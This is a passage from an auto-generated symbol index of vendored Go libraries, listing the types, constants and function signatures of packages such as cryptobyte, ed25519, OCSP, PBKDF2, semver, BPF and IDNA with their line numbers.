23) | type Builder struct method SetError (line 55) | func (b *Builder) SetError(err error) { method Bytes (line 61) | func (b *Builder) Bytes() ([]byte, error) { method BytesOrPanic (line 70) | func (b *Builder) BytesOrPanic() []byte { method AddUint8 (line 78) | func (b *Builder) AddUint8(v uint8) { method AddUint16 (line 83) | func (b *Builder) AddUint16(v uint16) { method AddUint24 (line 89) | func (b *Builder) AddUint24(v uint32) { method AddUint32 (line 94) | func (b *Builder) AddUint32(v uint32) { method AddUint48 (line 99) | func (b *Builder) AddUint48(v uint64) { method AddUint64 (line 104) | func (b *Builder) AddUint64(v uint64) { method AddBytes (line 109) | func (b *Builder) AddBytes(v []byte) { method AddUint8LengthPrefixed (line 145) | func (b *Builder) AddUint8LengthPrefixed(f BuilderContinuation) { method AddUint16LengthPrefixed (line 150) | func (b *Builder) AddUint16LengthPrefixed(f BuilderContinuation) { method AddUint24LengthPrefixed (line 155) | func (b *Builder) AddUint24LengthPrefixed(f BuilderContinuation) { method AddUint32LengthPrefixed (line 160) | func (b *Builder) AddUint32LengthPrefixed(f BuilderContinuation) { method callContinuation (line 164) | func (b *Builder) callContinuation(f BuilderContinuation, arg *Builder) { method addLengthPrefixed (line 187) | func (b *Builder) addLengthPrefixed(lenLen int, isASN1 bool, f Builder... method flushChild (line 216) | func (b *Builder) flushChild() { method add (line 294) | func (b *Builder) add(bytes ...byte) { method Unwrite (line 314) | func (b *Builder) Unwrite(n int) { method AddValue (line 345) | func (b *Builder) AddValue(v MarshalingValue) { function NewBuilder (line 37) | func NewBuilder(buffer []byte) *Builder { function NewFixedBuilder (line 46) | func NewFixedBuilder(buffer []byte) *Builder { type BuilderContinuation (line 135) | type BuilderContinuation type BuildError (line 140) | type BuildError struct type MarshalingValue (line 335) | type MarshalingValue interface FILE: vendor/golang.org/x/crypto/cryptobyte/string.go type String (line 22) | type String method read (line 26) | func (s *String) read(n int) []byte { method Skip (line 36) | func (s *String) Skip(n int) bool { method ReadUint8 (line 42) | func (s *String) ReadUint8(out *uint8) bool { method ReadUint16 (line 53) | func (s *String) ReadUint16(out *uint16) bool { method ReadUint24 (line 64) | func (s *String) ReadUint24(out *uint32) bool { method ReadUint32 (line 75) | func (s *String) ReadUint32(out *uint32) bool { method ReadUint48 (line 86) | func (s *String) ReadUint48(out *uint64) bool { method ReadUint64 (line 97) | func (s *String) ReadUint64(out *uint64) bool { method readUnsigned (line 106) | func (s *String) readUnsigned(out *uint32, length int) bool { method readLengthPrefixed (line 120) | func (s *String) readLengthPrefixed(lenLen int, outChild *String) bool { method ReadUint8LengthPrefixed (line 140) | func (s *String) ReadUint8LengthPrefixed(out *String) bool { method ReadUint16LengthPrefixed (line 147) | func (s *String) ReadUint16LengthPrefixed(out *String) bool { method ReadUint24LengthPrefixed (line 154) | func (s *String) ReadUint24LengthPrefixed(out *String) bool { method ReadBytes (line 160) | func (s *String) ReadBytes(out *[]byte, n int) bool { method CopyBytes (line 171) | func (s *String) CopyBytes(out []byte) bool { method Empty (line 181) | func (s String) Empty() bool { FILE: vendor/golang.org/x/crypto/ed25519/ed25519.go constant PublicKeySize (line 26) | PublicKeySize = 32 constant PrivateKeySize (line 28) | PrivateKeySize = 64 constant SignatureSize (line 30) | SignatureSize = 64 constant SeedSize (line 32) | SeedSize = 32 function GenerateKey (line 49) | func GenerateKey(rand io.Reader) (PublicKey, PrivateKey, error) { function NewKeyFromSeed (line 57) | func NewKeyFromSeed(seed []byte) PrivateKey { function Sign (line 63) | func Sign(privateKey PrivateKey, message []byte) []byte { function Verify (line 69) | func Verify(publicKey PublicKey, message, sig []byte) bool { FILE: vendor/golang.org/x/crypto/ocsp/ocsp.go type ResponseStatus (line 33) | type ResponseStatus method String (line 46) | func (r ResponseStatus) String() string { constant Success (line 36) | Success ResponseStatus = 0 constant Malformed (line 37) | Malformed ResponseStatus = 1 constant InternalError (line 38) | InternalError ResponseStatus = 2 constant TryLater (line 39) | TryLater ResponseStatus = 3 constant SignatureRequired (line 42) | SignatureRequired ResponseStatus = 5 constant Unauthorized (line 43) | Unauthorized ResponseStatus = 6 type ResponseError (line 68) | type ResponseError struct method Error (line 72) | func (r ResponseError) Error() string { type certID (line 79) | type certID struct type ocspRequest (line 87) | type ocspRequest struct type tbsRequest (line 91) | type tbsRequest struct type request (line 97) | type request struct type responseASN1 (line 101) | type responseASN1 struct type responseBytes (line 106) | type responseBytes struct type basicResponse (line 111) | type basicResponse struct type responseData (line 118) | type responseData struct type singleResponse (line 126) | type singleResponse struct type revokedInfo (line 136) | type revokedInfo struct function signingParamsForPublicKey (line 185) | func signingParamsForPublicKey(pub interface{}, requestedSigAlgo x509.Si... function getSignatureAlgorithmFromOID (line 252) | func getSignatureAlgorithmFromOID(oid asn1.ObjectIdentifier) x509.Signat... function getHashAlgorithmFromOID (line 262) | func getHashAlgorithmFromOID(target asn1.ObjectIdentifier) crypto.Hash { function getOIDFromHashAlgorithm (line 271) | func getOIDFromHashAlgorithm(target crypto.Hash) asn1.ObjectIdentifier { constant Good (line 286) | Good = 0 constant Revoked (line 288) | Revoked = 1 constant Unknown (line 290) | Unknown = 2 constant ServerFailed (line 294) | ServerFailed = 3 constant Unspecified (line 299) | Unspecified = 0 constant KeyCompromise (line 300) | KeyCompromise = 1 constant CACompromise (line 301) | CACompromise = 2 constant AffiliationChanged (line 302) | AffiliationChanged = 3 constant Superseded (line 303) | Superseded = 4 constant CessationOfOperation (line 304) | CessationOfOperation = 5 constant CertificateHold (line 305) | CertificateHold = 6 constant RemoveFromCRL (line 307) | RemoveFromCRL = 8 constant PrivilegeWithdrawn (line 308) | PrivilegeWithdrawn = 9 constant AACompromise (line 309) | AACompromise = 10 type Request (line 313) | type Request struct method Marshal (line 321) | func (req *Request) Marshal() ([]byte, error) { type Response (line 348) | type Response struct method CheckSignatureFrom (line 409) | func (resp *Response) CheckSignatureFrom(issuer *x509.Certificate) err... type ParseError (line 414) | type ParseError method Error (line 416) | func (p ParseError) Error() string { function ParseRequest (line 423) | func ParseRequest(bytes []byte) (*Request, error) { function ParseResponse (line 466) | func ParseResponse(bytes []byte, issuer *x509.Certificate) (*Response, e... function ParseResponseForCert (line 475) | func ParseResponseForCert(bytes []byte, cert, issuer *x509.Certificate) ... type RequestOptions (line 613) | type RequestOptions struct method hash (line 619) | func (opts *RequestOptions) hash() crypto.Hash { function CreateRequest (line 629) | func CreateRequest(cert, issuer *x509.Certificate, opts *RequestOptions)... function CreateResponse (line 683) | func CreateResponse(issuer, responderCert *x509.Certificate, template Re... FILE: vendor/golang.org/x/crypto/pbkdf2/pbkdf2.go function Key (line 42) | func Key(password, salt []byte, iter, keyLen int, h func() hash.Hash) []... FILE: vendor/golang.org/x/mod/semver/semver.go type parsed (line 28) | type parsed struct function IsValid (line 38) | func IsValid(v string) bool { function Canonical (line 48) | func Canonical(v string) string { function Major (line 65) | func Major(v string) string { function MajorMinor (line 76) | func MajorMinor(v string) string { function Prerelease (line 91) | func Prerelease(v string) string { function Build (line 102) | func Build(v string) string { function Compare (line 116) | func Compare(v, w string) int { function Max (line 145) | func Max(v, w string) string { type ByVersion (line 155) | type ByVersion method Len (line 157) | func (vs ByVersion) Len() int { return len(vs) } method Swap (line 158) | func (vs ByVersion) Swap(i, j int) { vs[i], vs[j] = vs[j], vs[i] } method Less (line 159) | func (vs ByVersion) Less(i, j int) bool { function Sort (line 168) | func Sort(list []string) { function parse (line 172) | func parse(v string) (p parsed, ok bool) { function parseInt (line 227) | func parseInt(v string) (t, rest string, ok bool) { function parsePrerelease (line 244) | func parsePrerelease(v string) (t, rest string, ok bool) { function parseBuild (line 272) | func parseBuild(v string) (t, rest string, ok bool) { function isIdentChar (line 296) | func isIdentChar(c byte) bool { function isBadNum (line 300) | func isBadNum(v string) bool { function isNum (line 308) | func isNum(v string) bool { function compareInt (line 316) | func compareInt(x, y string) int { function comparePrerelease (line 333) | func comparePrerelease(x, y string) int { function nextIdent (line 395) | func nextIdent(x string) (dx, rest string) { FILE: vendor/golang.org/x/net/bpf/asm.go function Assemble (line 14) | func Assemble(insts []Instruction) ([]RawInstruction, error) { function Disassemble (line 31) | func Disassemble(raw []RawInstruction) (insts []Instruction, allDecoded ... FILE: vendor/golang.org/x/net/bpf/constants.go type Register (line 8) | type Register constant RegA (line 13) | RegA Register = iota constant RegX (line 16) | RegX type ALUOp (line 20) | type ALUOp constant ALUOpAdd (line 24) | ALUOpAdd ALUOp = iota << 4 constant ALUOpSub (line 25) | ALUOpSub constant ALUOpMul (line 26) | ALUOpMul constant ALUOpDiv (line 27) | ALUOpDiv constant ALUOpOr (line 28) | ALUOpOr constant ALUOpAnd (line 29) | ALUOpAnd constant ALUOpShiftLeft (line 30) | ALUOpShiftLeft constant ALUOpShiftRight (line 31) | ALUOpShiftRight constant aluOpNeg (line 32) | aluOpNeg constant ALUOpMod (line 33) | ALUOpMod constant ALUOpXor (line 34) | ALUOpXor type JumpTest (line 38) | type JumpTest constant JumpEqual (line 44) | JumpEqual JumpTest = iota constant JumpNotEqual (line 46) | JumpNotEqual constant JumpGreaterThan (line 48) | JumpGreaterThan constant JumpLessThan (line 50) | JumpLessThan constant JumpGreaterOrEqual (line 52) | JumpGreaterOrEqual constant JumpLessOrEqual (line 54) | JumpLessOrEqual constant JumpBitsSet (line 56) | JumpBitsSet constant JumpBitsNotSet (line 58) | JumpBitsNotSet type Extension (line 70) | type Extension constant extOffset (line 76) | extOffset = -0x1000 constant ExtLen (line 78) | ExtLen Extension = 1 constant ExtProto (line 80) | ExtProto Extension = 0 constant ExtType (line 85) | ExtType Extension = 4 constant ExtPayloadOffset (line 89) | ExtPayloadOffset Extension = 52 constant ExtInterfaceIndex (line 92) | ExtInterfaceIndex Extension = 8 constant ExtNetlinkAttr (line 95) | ExtNetlinkAttr Extension = 12 constant ExtNetlinkAttrNested (line 98) | ExtNetlinkAttrNested Extension = 16 constant ExtMark (line 100) | ExtMark Extension = 20 constant ExtQueue (line 102) | ExtQueue Extension = 24 constant ExtLinkLayerType (line 105) | ExtLinkLayerType Extension = 28 constant ExtRXHash (line 109) | ExtRXHash Extension = 32 constant ExtCPUID (line 112) | ExtCPUID Extension = 36 constant ExtVLANTag (line 114) | ExtVLANTag Extension = 44 constant ExtVLANTagPresent (line 121) | ExtVLANTagPresent Extension = 48 constant ExtVLANProto (line 125) | ExtVLANProto Extension = 60 constant ExtRand (line 127) | ExtRand Extension = 56 constant opMaskCls (line 133) | opMaskCls uint16 = 0x7 constant opMaskLoadDest (line 135) | opMaskLoadDest = 0x01 constant opMaskLoadWidth (line 136) | opMaskLoadWidth = 0x18 constant opMaskLoadMode (line 137) | opMaskLoadMode = 0xe0 constant opMaskOperand (line 139) | opMaskOperand = 0x08 constant opMaskOperator (line 140) | opMaskOperator = 0xf0 constant opClsLoadA (line 147) | opClsLoadA uint16 = iota constant opClsLoadX (line 151) | opClsLoadX constant opClsStoreA (line 155) | opClsStoreA constant opClsStoreX (line 159) | opClsStoreX constant opClsALU (line 163) | opClsALU constant opClsJump (line 167) | opClsJump constant opClsReturn (line 171) | opClsReturn constant opClsMisc (line 175) | opClsMisc constant opAddrModeImmediate (line 179) | opAddrModeImmediate uint16 = iota << 5 constant opAddrModeAbsolute (line 180) | opAddrModeAbsolute constant opAddrModeIndirect (line 181) | opAddrModeIndirect constant opAddrModeScratch (line 182) | opAddrModeScratch constant opAddrModePacketLen (line 183) | opAddrModePacketLen constant opAddrModeMemShift (line 184) | opAddrModeMemShift constant opLoadWidth4 (line 188) | opLoadWidth4 uint16 = iota << 3 constant opLoadWidth2 (line 189) | opLoadWidth2 constant opLoadWidth1 (line 190) | opLoadWidth1 type opOperand (line 194) | type opOperand constant opOperandConstant (line 198) | opOperandConstant opOperand = iota << 3 constant opOperandX (line 199) | opOperandX type jumpOp (line 203) | type jumpOp constant opJumpAlways (line 207) | opJumpAlways jumpOp = iota << 4 constant opJumpEqual (line 208) | opJumpEqual constant opJumpGT (line 209) | opJumpGT constant opJumpGE (line 210) | opJumpGE constant opJumpSet (line 211) | opJumpSet constant opRetSrcConstant (line 215) | opRetSrcConstant uint16 = iota << 4 constant opRetSrcA (line 216) | opRetSrcA constant opMiscTAX (line 220) | opMiscTAX = 0x00 constant opMiscTXA (line 221) | opMiscTXA = 0x80 FILE: vendor/golang.org/x/net/bpf/instructions.go type Instruction (line 11) | type Instruction interface type RawInstruction (line 17) | type RawInstruction struct method Assemble (line 29) | func (ri RawInstruction) Assemble() (RawInstruction, error) { return r... method Disassemble (line 33) | func (ri RawInstruction) Disassemble() Instruction { function jumpOpToTest (line 149) | func jumpOpToTest(op jumpOp, skipTrue uint8, skipFalse uint8) (JumpTest,... type LoadConstant (line 185) | type LoadConstant struct method Assemble (line 191) | func (a LoadConstant) Assemble() (RawInstruction, error) { method String (line 196) | func (a LoadConstant) String() string { type LoadScratch (line 208) | type LoadScratch struct method Assemble (line 214) | func (a LoadScratch) Assemble() (RawInstruction, error) { method String (line 222) | func (a LoadScratch) String() string { type LoadAbsolute (line 235) | type LoadAbsolute struct method Assemble (line 241) | func (a LoadAbsolute) Assemble() (RawInstruction, error) { method String (line 246) | func (a LoadAbsolute) String() string { type LoadIndirect (line 264) | type LoadIndirect struct method Assemble (line 270) | func (a LoadIndirect) Assemble() (RawInstruction, error) { method String (line 275) | func (a LoadIndirect) String() string { type LoadMemShift (line 294) | type LoadMemShift struct method Assemble (line 299) | func (a LoadMemShift) Assemble() (RawInstruction, error) { method String (line 304) | func (a LoadMemShift) String() string { type LoadExtension (line 310) | type LoadExtension struct method Assemble (line 315) | func (a LoadExtension) Assemble() (RawInstruction, error) { method String (line 323) | func (a LoadExtension) String() string { type StoreScratch (line 363) | type StoreScratch struct method Assemble (line 369) | func (a StoreScratch) Assemble() (RawInstruction, error) { method String (line 390) | func (a StoreScratch) String() string { type ALUOpConstant (line 402) | type ALUOpConstant struct method Assemble (line 408) | func (a ALUOpConstant) Assemble() (RawInstruction, error) { method String (line 416) | func (a ALUOpConstant) String() string { type ALUOpX (line 444) | type ALUOpX struct method Assemble (line 449) | func (a ALUOpX) Assemble() (RawInstruction, error) { method String (line 456) | func (a ALUOpX) String() string { type NegateA (line 484) | type NegateA struct method Assemble (line 487) | func (a NegateA) Assemble() (RawInstruction, error) { method String (line 494) | func (a NegateA) String() string { type Jump (line 499) | type Jump struct method Assemble (line 504) | func (a Jump) Assemble() (RawInstruction, error) { method String (line 512) | func (a Jump) String() string { type JumpIf (line 518) | type JumpIf struct method Assemble (line 526) | func (a JumpIf) Assemble() (RawInstruction, error) { method String (line 531) | func (a JumpIf) String() string { type JumpIfX (line 537) | type JumpIfX struct method Assemble (line 544) | func (a JumpIfX) Assemble() (RawInstruction, error) { method String (line 549) | func (a JumpIfX) String() string { function jumpToRaw (line 554) | func jumpToRaw(test JumpTest, operand opOperand, k uint32, skipTrue, ski... function jumpToString (line 592) | func jumpToString(cond JumpTest, operand string, skipTrue, skipFalse uin... function conditionalJump (line 626) | func conditionalJump(operand string, skipTrue, skipFalse uint8, positive... type RetA (line 637) | type RetA struct method Assemble (line 640) | func (a RetA) Assemble() (RawInstruction, error) { method String (line 647) | func (a RetA) String() string { type RetConstant (line 652) | type RetConstant struct method Assemble (line 657) | func (a RetConstant) Assemble() (RawInstruction, error) { method String (line 665) | func (a RetConstant) String() string { type TXA (line 670) | type TXA struct method Assemble (line 673) | func (a TXA) Assemble() (RawInstruction, error) { method String (line 680) | func (a TXA) String() string { type TAX (line 685) | type TAX struct method Assemble (line 688) | func (a TAX) Assemble() (RawInstruction, error) { method String (line 695) | func (a TAX) String() string { function assembleLoad (line 699) | func assembleLoad(dst Register, loadSize int, mode uint16, k uint32) (Ra... FILE: vendor/golang.org/x/net/bpf/setter.go type Setter (line 8) | type Setter interface FILE: vendor/golang.org/x/net/bpf/vm.go type VM (line 13) | type VM struct method Run (line 85) | func (v *VM) Run(in []byte) (int, error) { function NewVM (line 18) | func NewVM(filter []Instruction) (*VM, error) { FILE: vendor/golang.org/x/net/bpf/vm_instructions.go function aluOpConstant (line 12) | func aluOpConstant(ins ALUOpConstant, regA uint32) uint32 { function aluOpX (line 16) | func aluOpX(ins ALUOpX, regA uint32, regX uint32) (uint32, bool) { function aluOpCommon (line 29) | func aluOpCommon(op ALUOp, regA uint32, value uint32) uint32 { function jumpIf (line 58) | func jumpIf(ins JumpIf, regA uint32) int { function jumpIfX (line 62) | func jumpIfX(ins JumpIfX, regA uint32, regX uint32) int { function jumpIfCommon (line 66) | func jumpIfCommon(cond JumpTest, skipTrue, skipFalse uint8, regA uint32,... function loadAbsolute (line 95) | func loadAbsolute(ins LoadAbsolute, in []byte) (uint32, bool) { function loadConstant (line 102) | func loadConstant(ins LoadConstant, regA uint32, regX uint32) (uint32, u... function loadExtension (line 113) | func loadExtension(ins LoadExtension, in []byte) uint32 { function loadIndirect (line 122) | func loadIndirect(ins LoadIndirect, in []byte, regX uint32) (uint32, boo... function loadMemShift (line 129) | func loadMemShift(ins LoadMemShift, in []byte) (uint32, bool) { function inBounds (line 141) | func inBounds(inLen int, offset int, size int) bool { function loadCommon (line 145) | func loadCommon(in []byte, offset int, size int) (uint32, bool) { function loadScratch (line 162) | func loadScratch(ins LoadScratch, regScratch [16]uint32, regA uint32, re... function storeScratch (line 173) | func storeScratch(ins StoreScratch, regScratch [16]uint32, regA uint32, ... FILE: vendor/golang.org/x/net/idna/go118.go constant transitionalLookup (line 13) | transitionalLookup = false FILE: vendor/golang.org/x/net/idna/idna10.0.0.go function ToASCII (line 46) | func ToASCII(s string) (string, error) { function ToUnicode (line 51) | func ToUnicode(s string) (string, error) { type Option (line 56) | type Option function Transitional (line 63) | func Transitional(transitional bool) Option { function VerifyDNSLength (line 71) | func VerifyDNSLength(verify bool) Option { function RemoveLeadingDots (line 77) | func RemoveLeadingDots(remove bool) Option { function ValidateLabels (line 86) | func ValidateLabels(enable bool) Option { function CheckHyphens (line 109) | func CheckHyphens(enable bool) Option { function CheckJoiners (line 117) | func CheckJoiners(enable bool) Option { function StrictDomainName (line 134) | func StrictDomainName(use bool) Option { function BidiRule (line 145) | func BidiRule() Option { function ValidateForRegistration (line 151) | func ValidateForRegistration() Option { function MapForLookup (line 169) | func MapForLookup() Option { type options (line 177) | type options struct type Profile (line 200) | type Profile struct method ToASCII (line 228) | func (p *Profile) ToASCII(s string) (string, error) { method ToUnicode (line 236) | func (p *Profile) ToUnicode(s string) (string, error) { method String (line 244) | func (p *Profile) String() string { method process (line 336) | func (p *Profile) process(s string, toASCII bool) (string, error) { method simplify (line 601) | func (p *Profile) simplify(cat category) category { method validateLabel (line 709) | func (p *Profile) validateLabel(s string) (err error) { function apply (line 204) | func apply(o *options, opts []Option) { function New (line 218) | func New(o ...Option) *Profile { type labelError (line 320) | type labelError struct method code (line 322) | func (e labelError) code() string { return e.code_ } method Error (line 323) | func (e labelError) Error() string { type runeError (line 327) | type runeError method code (line 329) | func (e runeError) code() string { return "P1" } method Error (line 330) | func (e runeError) Error() string { function normalize (line 427) | func normalize(p *Profile, s string) (mapped string, isBidi bool, err er... function validateRegistration (line 436) | func validateRegistration(p *Profile, s string) (idem string, bidi bool,... method isBidi (line 461) | func (c info) isBidi(s string) bool { function validateAndMap (line 475) | func validateAndMap(p *Profile, s string) (vm string, bidi bool, err err... type labelIter (line 539) | type labelIter struct method reset (line 547) | func (l *labelIter) reset() { method done (line 553) | func (l *labelIter) done() bool { method result (line 557) | func (l *labelIter) result() string { method label (line 564) | func (l *labelIter) label() string { method next (line 577) | func (l *labelIter) next() { method set (line 591) | func (l *labelIter) set(s string) { constant acePrefix (line 599) | acePrefix = "xn--" function validateFromPunycode (line 626) | func validateFromPunycode(p *Profile, s string) error { constant zwnj (line 646) | zwnj = "\u200c" constant zwj (line 647) | zwj = "\u200d" type joinState (line 650) | type joinState constant stateStart (line 653) | stateStart joinState = iota constant stateVirama (line 654) | stateVirama constant stateBefore (line 655) | stateBefore constant stateBeforeVirama (line 656) | stateBeforeVirama constant stateAfter (line 657) | stateAfter constant stateFAIL (line 658) | stateFAIL function ascii (line 762) | func ascii(s string) bool { FILE: vendor/golang.org/x/net/idna/idna9.0.0.go function ToASCII (line 45) | func ToASCII(s string) (string, error) { function ToUnicode (line 50) | func ToUnicode(s string) (string, error) { type Option (line 55) | type Option function Transitional (line 62) | func Transitional(transitional bool) Option { function VerifyDNSLength (line 70) | func VerifyDNSLength(verify bool) Option { function RemoveLeadingDots (line 76) | func RemoveLeadingDots(remove bool) Option { function ValidateLabels (line 85) | func ValidateLabels(enable bool) Option { function CheckHyphens (line 108) | func CheckHyphens(enable bool) Option { function CheckJoiners (line 116) | func CheckJoiners(enable bool) Option { function StrictDomainName (line 133) | func StrictDomainName(use bool) Option { function BidiRule (line 144) | func BidiRule() Option { function ValidateForRegistration (line 150) | func ValidateForRegistration() Option { function MapForLookup (line 168) | func MapForLookup() Option { type options (line 177) | type options struct type Profile (line 200) | type Profile struct method ToASCII (line 228) | func (p *Profile) ToASCII(s string) (string, error) { method ToUnicode (line 236) | func (p *Profile) ToUnicode(s string) (string, error) { method String (line 244) | func (p *Profile) String() string { method process (line 338) | func (p *Profile) process(s string, toASCII bool) (string, error) { method simplify (line 551) | func (p *Profile) simplify(cat category) category { method validateLabel (line 654) | func (p *Profile) validateLabel(s string) error { function apply (line 204) | func apply(o *options, opts []Option) { function New (line 218) | func New(o ...Option) *Profile { type labelError (line 322) | type labelError struct method code (line 324) | func (e labelError) code() string { return e.code_ } method Error (line 325) | func (e labelError) Error() string { type runeError (line 329) | type runeError method code (line 331) | func (e runeError) code() string { return "P1" } method Error (line 332) | func (e runeError) Error() string { function normalize (line 418) | func normalize(p *Profile, s string) (string, error) { function validateRegistration (line 422) | func validateRegistration(p *Profile, s string) (string, error) { function validateAndMap (line 442) | func validateAndMap(p *Profile, s string) (string, error) { type labelIter (line 489) | type labelIter struct method reset (line 497) | func (l *labelIter) reset() { method done (line 503) | func (l *labelIter) done() bool { method result (line 507) | func (l *labelIter) result() string { method label (line 514) | func (l *labelIter) label() string { method next (line 527) | func (l *labelIter) next() { method set (line 541) | func (l *labelIter) set(s string) { constant acePrefix (line 549) | acePrefix = "xn--" function validateFromPunycode (line 576) | func validateFromPunycode(p *Profile, s string) error { constant zwnj (line 591) | zwnj = "\u200c" constant zwj (line 592) | zwj = "\u200d" type joinState (line 595) | type joinState constant stateStart (line 598) | stateStart joinState = iota constant stateVirama (line 599) | stateVirama constant stateBefore (line 600) | stateBefore constant stateBeforeVirama (line 601) | stateBeforeVirama constant stateAfter (line 602) | stateAfter constant stateFAIL (line 603) | stateFAIL function ascii (line 710) | func ascii(s string) bool { FILE: vendor/golang.org/x/net/idna/pre_go118.go constant transitionalLookup (line 11) | transitionalLookup = true FILE: vendor/golang.org/x/net/idna/punycode.go constant base (line 22) | base int32 = 36 constant damp (line 23) | damp int32 = 700 constant initialBias (line 24) | initialBias int32 = 72 constant initialN (line 25) | initialN int32 = 128 constant skew (line 26) | skew int32 = 38 constant tmax (line 27) | tmax int32 = 26 constant tmin (line 28) | tmin int32 = 1 function punyError (line 31) | func punyError(s string) error { return &labelError{s, "A3"} } function decode (line 34) | func decode(encoded string) (string, error) { function encode (line 105) | func encode(prefix, s string) (string, error) { function madd (line 173) | func madd(a, b, c int32) (next int32, overflow bool) { function decodeDigit (line 181) | func decodeDigit(x byte) (digit int32, ok bool) { function encodeDigit (line 193) | func encodeDigit(digit int32) byte { function adapt (line 204) | func adapt(delta, numPoints int32, firstTime bool) int32 { FILE: vendor/golang.org/x/net/idna/tables10.0.0.go constant UnicodeVersion (line 8) | UnicodeVersion = "10.0.0" type idnaTrie (line 550) | type idnaTrie struct method lookup (line 382) | func (t *idnaTrie) lookup(s []byte) (v uint16, sz int) { method lookupUnsafe (line 444) | func (t *idnaTrie) lookupUnsafe(s []byte) uint16 { method lookupString (line 467) | func (t *idnaTrie) lookupString(s string) (v uint16, sz int) { method lookupStringUnsafe (line 529) | func (t *idnaTrie) lookupStringUnsafe(s string) uint16 { method lookupValue (line 557) | func (t *idnaTrie) lookupValue(n uint32, b byte) uint16 { function newIdnaTrie (line 552) | func newIdnaTrie(i int) *idnaTrie { FILE: vendor/golang.org/x/net/idna/tables11.0.0.go constant UnicodeVersion (line 8) | UnicodeVersion = "11.0.0" type idnaTrie (line 550) | type idnaTrie struct method lookup (line 382) | func (t *idnaTrie) lookup(s []byte) (v uint16, sz int) { method lookupUnsafe (line 444) | func (t *idnaTrie) lookupUnsafe(s []byte) uint16 { method lookupString (line 467) | func (t *idnaTrie) lookupString(s string) (v uint16, sz int) { method lookupStringUnsafe (line 529) | func (t *idnaTrie) lookupStringUnsafe(s string) uint16 { method lookupValue (line 557) | func (t *idnaTrie) lookupValue(n uint32, b byte) uint16 { function newIdnaTrie (line 552) | func newIdnaTrie(i int) *idnaTrie { FILE: vendor/golang.org/x/net/idna/tables12.0.0.go constant UnicodeVersion (line 8) | UnicodeVersion = "12.0.0" type idnaTrie (line 550) | type idnaTrie struct method lookup (line 382) | func (t *idnaTrie) lookup(s []byte) (v uint16, sz int) { method lookupUnsafe (line 444) | func (t *idnaTrie) lookupUnsafe(s []byte) uint16 { method lookupString (line 467) | func (t *idnaTrie) lookupString(s string) (v uint16, sz int) { method lookupStringUnsafe (line 529) | func (t *idnaTrie) lookupStringUnsafe(s string) uint16 { method lookupValue (line 557) | func (t *idnaTrie) lookupValue(n uint32, b byte) uint16 { function newIdnaTrie (line 552) | func newIdnaTrie(i int) *idnaTrie { FILE: vendor/golang.org/x/net/idna/tables13.0.0.go constant UnicodeVersion (line 8) | UnicodeVersion = "13.0.0" type idnaTrie (line 693) | type idnaTrie struct method lookup (line 525) | func (t *idnaTrie) lookup(s []byte) (v uint16, sz int) { method lookupUnsafe (line 587) | func (t *idnaTrie) lookupUnsafe(s []byte) uint16 { method lookupString (line 610) | func (t *idnaTrie) lookupString(s string) (v uint16, sz int) { method lookupStringUnsafe (line 672) | func (t *idnaTrie) lookupStringUnsafe(s string) uint16 { method lookupValue (line 700) | func (t *idnaTrie) lookupValue(n uint32, b byte) uint16 { function newIdnaTrie (line 695) | func newIdnaTrie(i int) *idnaTrie { FILE: vendor/golang.org/x/net/idna/tables15.0.0.go constant UnicodeVersion (line 8) | UnicodeVersion = "15.0.0" type idnaTrie (line 708) | type idnaTrie struct method lookup (line 540) | func (t *idnaTrie) lookup(s []byte) (v uint16, sz int) { method lookupUnsafe (line 602) | func (t *idnaTrie) lookupUnsafe(s []byte) uint16 { method lookupString (line 625) | func (t *idnaTrie) lookupString(s string) (v uint16, sz int) { method lookupStringUnsafe (line 687) | func (t *idnaTrie) lookupStringUnsafe(s string) uint16 { method lookupValue (line 715) | func (t *idnaTrie) lookupValue(n uint32, b byte) uint16 { function newIdnaTrie (line 710) | func newIdnaTrie(i int) *idnaTrie { FILE: vendor/golang.org/x/net/idna/tables9.0.0.go constant UnicodeVersion (line 8) | UnicodeVersion = "9.0.0" type idnaTrie (line 550) | type idnaTrie struct method lookup (line 382) | func (t *idnaTrie) lookup(s []byte) (v uint16, sz int) { method lookupUnsafe (line 444) | func (t *idnaTrie) lookupUnsafe(s []byte) uint16 { method lookupString (line 467) | func (t *idnaTrie) lookupString(s string) (v uint16, sz int) { method lookupStringUnsafe (line 529) | func (t *idnaTrie) lookupStringUnsafe(s string) uint16 { method lookupValue (line 557) | func (t *idnaTrie) lookupValue(n uint32, b byte) uint16 { function newIdnaTrie (line 552) | func newIdnaTrie(i int) *idnaTrie { FILE: vendor/golang.org/x/net/idna/trie.go type valueRange (line 11) | type valueRange struct type sparseBlocks (line 16) | type sparseBlocks struct method lookup (line 33) | func (t *sparseBlocks) lookup(n uint32, b byte) uint16 { FILE: vendor/golang.org/x/net/idna/trie12.0.0.go method appendMapping (line 13) | func (c info) appendMapping(b []byte, s string) []byte { FILE: vendor/golang.org/x/net/idna/trie13.0.0.go method appendMapping (line 13) | func (c info) appendMapping(b []byte, s string) []byte { FILE: vendor/golang.org/x/net/idna/trieval.go type info (line 40) | type info method isMapped (line 94) | func (c info) isMapped() bool { method category (line 98) | func (c info) category() category { method joinType (line 106) | func (c info) joinType() info { method isModifier (line 113) | func (c info) isModifier() bool { method isViramaModifier (line 117) | func (c info) isViramaModifier() bool { constant catSmallMask (line 43) | catSmallMask = 0x3 constant catBigMask (line 44) | catBigMask = 0xF8 constant indexShift (line 45) | indexShift = 3 constant xorBit (line 46) | xorBit = 0x4 constant inlineXOR (line 47) | inlineXOR = 0xE000 constant joinShift (line 49) | joinShift = 8 constant joinMask (line 50) | joinMask = 0x07 constant attributesMask (line 53) | attributesMask = 0x1800 constant viramaModifier (line 54) | viramaModifier = 0x1800 constant modifier (line 55) | modifier = 0x1000 constant rtl (line 56) | rtl = 0x0800 constant mayNeedNorm (line 58) | mayNeedNorm = 0x2000 type category (line 62) | type category constant unknown (line 65) | unknown category = 0 constant mapped (line 66) | mapped category = 1 constant disallowedSTD3Mapped (line 67) | disallowedSTD3Mapped category = 2 constant deviation (line 68) | deviation category = 3 constant valid (line 72) | valid category = 0x08 constant validNV8 (line 73) | validNV8 category = 0x18 constant validXV8 (line 74) | validXV8 category = 0x28 constant disallowed (line 75) | disallowed category = 0x40 constant disallowedSTD3Valid (line 76) | disallowedSTD3Valid category = 0x80 constant ignored (line 77) | ignored category = 0xC0 constant joiningL (line 82) | joiningL = (iota + 1) constant joiningD (line 83) | joiningD constant joiningT (line 84) | joiningT constant joiningR (line 85) | joiningR constant joinZWJ (line 88) | joinZWJ constant joinZWNJ (line 89) | joinZWNJ constant joinVirama (line 90) | joinVirama constant numJoinTypes (line 91) | numJoinTypes FILE: vendor/golang.org/x/net/internal/iana/const.go constant 